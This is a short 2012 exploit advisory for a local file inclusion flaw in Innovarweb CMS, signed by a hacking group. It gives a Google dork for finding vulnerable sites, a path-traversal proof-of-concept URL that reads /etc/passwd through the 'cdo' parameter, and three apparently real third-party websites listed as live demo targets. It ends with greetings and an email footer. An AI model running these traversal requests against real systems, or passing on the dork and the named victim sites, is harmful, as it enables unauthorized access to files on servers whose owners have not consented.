
# Exploit Title: Innovarweb CMS / Local File Inclusion# Date:
31/08/2012# Author: Daniel Godoy# Author
Mail:DanielGodoy[at]GobiernoFederal[dot]com# Author Web:
www.delincuentedigital.com.ar# Software web:
http://www.innovarweb.com.ar/interior/index.php?cdo=servicios/gestor_contenidos.php#
Tested on: Linux# Dork: allinurl:"index.php?cdo="
Â [Comment]Greetz: Hernan Jais, Alfonso Cuevas, SPEED, hacklego,
Incid3nt,Maximiliano Soler,
Pablin77,_tty0,Login-Root,Knet,Kikito,Duraznit0,InyeXion, ksha,
zerial,LinuxFer,Scorp Â  Â her0, r0dr1 y demas user de RemoteExecution
Â Â www.remoteexecution.info www.remoteexcution.com.ar
Â Â #RemoteExecution Hacking Group Â Â 

[PoC]
http://target/index.php?cdo=../../../../.././etc/passwd
[DEMO]http://www.westingcapitalinc.com/index.php?cdo=./../../../../../etc/passwdhttp://www.areneracolonia.com.ar/interior/index.php?cdo=../../../../../../etc/passwdhttp://www.suspensioncarlitos.com.ar/index.php?cdo=../../../../../../etc/passwd

-------------------------
Correo enviado por medio de MailMonstruo - www.mailmonstruo.com